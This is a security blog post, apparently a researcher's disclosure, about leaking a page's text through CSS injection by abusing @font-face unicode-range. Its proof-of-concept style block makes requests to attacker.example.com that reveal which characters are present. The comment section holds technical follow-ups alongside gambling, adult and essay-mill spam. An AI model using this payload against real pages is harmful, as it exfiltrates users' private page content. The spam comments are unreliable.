Using this technique, an attacker can read page's text partially by CSS only.
An attacker might use this technique in the following cases:
- Browser's XSS filter bypass (e.g. XSS Auditor does not block <style> injection)
- Only CSS injection is allowed in the target page
As far as I know, known CSS based attack can read attribute (See Attribute Reader: http://p42.us/css/) but can't read characters of text node. This vector can do it, not perfect though :)
So far, this vector can be used in Chrome and Firefox Nightly 44.
Let's go:
<style>
@font-face{
font-family:poc;
src: url(http://attacker.example.com/?A); /* fetched */
unicode-range:U+0041;
}
@font-face{
font-family:poc;
src: url(http://attacker.example.com/?B); /* fetched too */
unicode-range:U+0042;
}
@font-face{
font-family:poc;
src: url(http://attacker.example.com/?C); /* not fetched */
unicode-range:U+0043;
}
#sensitive-information{
font-family:poc;
}
</style>
<p id="sensitive-information">AB</p>
When you access this page, Chrome and Firefox fetch "?A" and "?B" because text node of sensitive-information contains "A" and "B" characters. But Chrome and Firefox do not fetch "?C" because it does not contain "C". This means that we have been able to read "A" and "B".
Let's see another example: http://vulnerabledoma.in/poc_unicode-range2.html
You can see external requests including page text (M,a,s,t,o,K,i,n,u,g,w) from DevTools. Like the following:
As you can see, we can't know duplicated characters. But in some cases like this PoC, I think that it can give an attacker enough information.
I reported this trick to Chrome Team but it has been marked WontFix on Issue 543078.
It seems that this behavior is spec'd. See EXAMPLE 13 of http://www.w3.org/TR/css3-fonts/#composite-fonts. Due to this behavior, users can save bandwidth. But as the side effect, an attacker got new attack vector.
This is a really interesting way to exploit that the browser will go through all specified fonts, even if it's a houndred and none exists, it's still a request made.
ReplyDeleteYou can easily use that for input fields, except the password type...
ReplyDeleteany work-around to make duplicated characters work?
ReplyDeleteIt could be possible to figure out character combinations using ligatures. I'm not sure if it's possible to make the requests to remote server for ligatures other than those defined as separate characters in UNICODE (in practice, only ff, ffi, fi).
ReplyDeleteCustom font could be used to make all character combinations different width or height and somehow try to leak the width or height of the element to remote server.
I don’t know whether it’s just me or if perhaps everyone else experiencing problems with your blog.
ReplyDelete섯다
It looks like some of the text within your posts are running off the screen. Can someone else please provide feedback and let me know if this is happening to them as well?
ReplyDeleteThis may be a issue with my browser because I’ve had
this happen previously. Cheers!
스포츠토토
Great writing to see, glad that google brought me here, Keep Up cool job!
ReplyDeleteIf you are going for best contents like I do, simply go to see this website all the time as it provides feature contents, thanks
한국야동
토토
ReplyDelete프로토
안전놀이터
Great write-up, I am a big believer in commenting on blogs to inform the blog writers know that they’ve added something worthwhile to the world wide web!..
스포츠중계
ReplyDelete스포츠토토티비
토토사이트
I would love to visit this website every day. As this promotes eternal knowledge.
토토
ReplyDelete배트맨토토
먹튀검증
Your article has proven very informative and very useful to me. It was very obvious that you are much knowledgeable in this area.
It's good to see you, need buy custom essays online ?! We have the best pricing policy on the market. We understand many students forgo many things to live within their budget. We do not intend to constrain it further, which is why our services are affordable. We want all our clients to buy essay papers cheap and achieve their academic goals.
ReplyDeleteThis insightful blog post delves into a fascinating technique, revealing potential vulnerabilities in Chrome and Firefox Nightly 44. The clarity in your explanations and real-world examples makes it accessible even for those less familiar with cybersecurity intricacies. Reckless Driving Lawyer Monmouth County Your proactive approach in reporting to the Chrome Team reflects a commendable commitment to enhancing web security. Kudos on shedding light on these potential risks and contributing to the collective effort in making the online space safer for everyone! Driving Without A License In New Jersey
ReplyDeleteOnline platforms in India provide an extensive collection of binoculars that cater to various needs and budgets. From compact and lightweight models perfect for travelers and hikers, to heavy-duty binoculars with advanced features suitable for professional use, you can find it all online. These e-commerce platforms also offer detailed product descriptions, customer reviews, and ratings, allowing you to make an informed decision before purchasing.
ReplyDeleteAdditionally, many online retailers offer attractive deals and discounts, making it a cost-effective way to buy binoculars in India. Shopping for binoculars online India provides the convenience of browsing through a wide selection of options, comparing prices and features, and having your chosen product delivered right to your doorstep.
CSS based Attack: Abusing unicode-range of @font-face' for a deep dive into web security. It's a fascinating read for anyone interested in the intricacies of CSS vulnerabilities. And while you're enhancing your knowledge, why not relax with the soothing aroma of coffee scented candles?
ReplyDeleteDarryl Davis & Associates is the perfect partner for tackling flood damage insurance claims. With their in-depth understanding of insurance policies and proven negotiation skills, they make sure you’re not left shortchanged after a disaster.
ReplyDeleteCSS attacks leveraging @font-face and unicode-range let attackers partially read page text where only CSS injection is possible, bypassing XSS filters. Unlike prior methods, this targets text nodes directly. Imagine a game where bad fonts are your weapons – like in Funny Shooter 2 , but with style sheets! Currently affects Chrome and Firefox Nightly 44.
ReplyDeleteWeb security needs strong emphasis on safe coding practices because CSS-based attacks present a serious threat to online systems. Developers and digital marketers need to understand these security weaknesses for their respective work. The social media marketing dissertation help seeks to study deep research areas with topics such as online safety because it directly affects user trust and engagement.
ReplyDelete
ReplyDeleteWow, that's a clever CSS attack! I had no idea you could abuse @font-face like that. Definitely something to keep in mind for web security. Thanks for sharing!
This CSS attack is wild! I never thought of abusing @font-face's unicode-range like that. Super interesting and a bit scary! Gotta keep this in mind for future web dev projects.
ReplyDeleteThis article brilliantly captures its subject with clear insights and engaging prose. The well-structured arguments and vivid examples make it both informative and compelling. Concise yet impactful, it holds the reader's attention from start to finish, leaving a lasting impression. A must-read for anyone interested in the topic.https://houseofhazards.run/
ReplyDelete